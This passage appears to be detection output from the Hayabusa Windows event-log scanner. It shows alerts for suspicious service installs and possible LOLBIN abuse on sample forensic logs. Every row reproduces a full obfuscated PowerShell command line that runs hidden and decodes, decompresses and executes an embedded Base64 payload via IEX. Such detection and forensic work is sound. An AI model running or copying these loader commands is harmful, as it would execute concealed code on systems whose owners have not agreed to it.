rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: DrzkXznQhkKgYssd | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: DrzkXznQhkKgYssd | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 05:38:04.041 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0xc40 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 05:38:04.087 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe64 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 05:38:04.643 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa3c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: TDhDnlnsrKrQVnjY | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: TDhDnlnsrKrQVnjY | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMC